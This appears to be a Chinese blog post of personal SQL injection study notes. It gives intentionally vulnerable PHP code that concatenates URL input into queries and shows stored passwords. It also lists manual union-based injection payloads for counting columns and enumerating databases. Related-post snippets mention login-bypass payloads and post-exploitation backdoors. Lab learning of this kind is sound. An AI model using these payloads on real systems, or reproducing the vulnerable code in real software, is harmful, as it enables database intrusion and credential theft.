sql注入笔记

最新推荐文章于 2023-03-27 15:45:42 发布
最新推荐文章于 2023-03-27 15:45:42 发布
阅读量244 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39047764/article/details/79329815
版权

环境为PHP+mysqli

sqltest.php      PHP部分代码----可以实现地址栏改变x值访问,以及and,or输出全部

<?php 
//fendo数据库root用户连接mysql数据库,操作user表
//$id=1; 
$id= $_GET['x'];//接受get传递的参数名x的值并赋值给变量id 
$conn=mysqli_connect("localhost","root","","fendo",3306);
//$conn = mysql_connect('localhost','root','',"fendo",3306);//连接mysql数据库 


//mysql_select_db('fendo',$conn);//选择$conn连接请求下的test数据库名 
$sql = "select * from user where id=$id";//定义sql语句并组合变量id 
$result = mysqli_query($conn,$sql);//执行sql语句并返回给变量result 
while($row = mysqli_fetch_array($result)){//遍历数组数据并显示 
echo "ID".$row['id']."</br>"; 
echo "用户名".$row['username']."</br>"; 
echo "密码".$row['password']."</br>"; 

mysqli_close($conn);//关闭数据库连接 
echo "<hr>"; 
echo "当前语句:"; 
echo $sql  

?> 


HTML部分代码,可以实现x,无法实现and,or,

<html>  
<head>   
<meta charset="utf-8" />   
<title>sql注入测试</title>   
<style>   
body{text-align:center}   
</style>   
</head>   
<body>   
<br>  
<?php  
    include "php/conn.php";  
    $id=@$_GET['id'];//id未经过滤  
    $conn=mysqli_connect("localhost","root","","fendo",3306);
    if($id==null){  
        $id="1";  
    }  
    mysqli_query($conn,"set names utf8");  
    $sql = "SELECT * FROM user WHERE id='$id'";  
    $result = mysqli_query($conn,$sql);  
    $row = mysqli_fetch_array($result); 
    echo $row['username']; 
    ?> 
    <font size="10" face="Times">sql注入测试</font>  
<table border='2'  align="center">  
<tr>  
<td>id:<?php echo $id;?></td>  
</tr>  
<tr>  
<td>标题:<?php echo $row['username'];?></td>  
</tr>  
<tr>  
<td>内容:<?php echo $row['password'];?></td>  
</tr>  
<tr>  
<td>sql内容: <?php echo $sql;?></td>  
</tr>  
</table>  
<a href='./admin.php'>点我进入后台</a>        
<a href='http://pmd5.com/'>md5解密可以点我</a>  
</body>   

</html>  

1.判断sql注入---and or判断是可以连接的

加减法  %2b  这里可以转换成+号,也能成功运算以及输出,减号不需要转义直接写;

2.数据库权限判断---and ord(mid(user(),1,1))=114  加入到PHP地址末尾可以,HTML末尾似乎也行;

 and (select count(*) from mysql.user)>0  这个应该成功了,当大于5时返回错误,没有任何报错

3.判断字段数   and 1=1 union select 1,2   在PHP里面返回了错误,后面加3,返回正确,这个是行数,就是字段数;

     union select null,null,null    几个null就代表几个字段数,正确可以返回,错了什么都没有

    order by 1,2,3  一样的效果

4.查询库名---union select 1,database(),3 limit 1,1 

union select null,schema_name,null from information_schema.schemata 

5.查表名
6.查字段
7.查数据
邱家少爷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入笔记1_基础知识
m0_46604997的博客
07-13 3390
SQL漏洞发现与利用 1.发现存在sql注入 2.通过sql注入获取账号密码 3.找登陆界面(会员登陆,后台登陆界面) 4.登陆,比如有个上传页面 5.上传木马 6.用工具连接上传的木马 7.普通权限–》提权 8.后渗透,留一些后门(ATP可持续攻击) 9.内网渗透 一、基础知识 1、WEB服务器-静态网页 : html或者htm,是一种静态的页面格式,不需要服务器解析其中的脚本,由浏览器解析。 不依赖数据库 灵活性差,制作、更新、维护麻烦 交互性差,在功能方面有较大的限制 安全,不存在sql注入漏洞
BWAPPsql注入部分详解
tianzhende_kun的博客
02-28 806
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
SQL注入学习笔记
最新发布
Dasdwer的博客
03-27 316
必要知识:在MySql5.0以上版本中,MySQL存在一个自带数据库名为information_schema,他是一个存储记录所有数据库名,表名,列名的数据库,也相当于可以通过查询他获取指定数据库下面的表名或列名信息。一般select 有回显,insert,update,delete等无回显,需要用到报错盲注(一般使用报错回显,效率最高)sqlmap,超级sql注入工具咋用的,怎么去获取数据库,读表,查数据 ,os-shell。报错显示,遗留文件,漏洞报错,平台配置文件,爆破(网站常见路径)等。
SQL注入笔记
天上掉馅饼
02-25 153
sql注入笔记
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 手工注入是指攻击者通过构造特殊的输入来inject恶意的 SQL 代码,使得数据库执行恶意的操作。手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍。 一、...
SQL注入(自学笔记
woqusss的博客
08-10 354
SQL注入当属漏洞之王,具有高危害性,且利用条件低,利用以及绕过检测方式多种多样。这篇笔记主要从SQL注入的危害性,以及SQL注入的条件,注入点的判断以及寻找,注入的方式以及类型,不同业务场景下对应的不同query方式利用,成功注入后应该进行的步骤,在具有root高权限账户时候应该进行的操作下,防御以及后端过滤方式和Waf绕过,一些本人见过的查询语句闭合方式。...
SQL注入笔记
m0_62617107的博客
05-14 336
数据库基础 1.Mysql基础操作 2.Mysql表一些基本操作 3.Mysql的常用变量(函数) 4.Mysql的常用符号 1. & and 2. || or 3. xor 5.Mysql的常用函数 什么是SQL注入? 对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾,添加额外的SQL语句 SQL注入的危害 ·数据库信息泄露:数据库中存放的用户的隐私信息的泄露 ·网页篡改:通过操作数据库对特定网页进..
bwapp靶场笔记 -SQL注入
m0_52149675的博客
10-30 1557
​启动靶场。
BWAPP之SQL注入通关
qq_43665434的博客
04-17 2761
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
bWAPP SQL注入
angry_program的博客
03-03 6787
步骤 下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入,注入是字符型还是整数型 2.猜解SQL查询语句中的字段数 (order by ) 3.确定显示的字段顺序 4.获取当前数据库 (爆库) 5.获取数据库中的表 (爆表) 6.获取表中的字段名 (爆字段) 7.下载数据 (爆数据) 0x01SQL Injection (GET/Search) ...
kali linux之手动漏洞挖掘三(sql注入
weixin_30786657的博客
03-02 273
服务器端程序将用户输入作为参数作为查询条件,直接拼写sql语句,并将结果返回给客户端浏览器 如判断登录 select * from users where user='uname' and password='pass' select * from users where user='name' and password="or"='' 基于报错的检测方法: '...
bwapp 随笔
freshfox的博客
08-11 2116
SQL Injection (GET/Search) C:\Python27\sqlmap>python sqlmap.py  -u  "http://localhost/bwapp/sqli_1.php?titl e=sfsdf&action=search"  --cookie="PHPSESSID=k60mg7l865e7l5jrp9gr8l6c84;security_

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值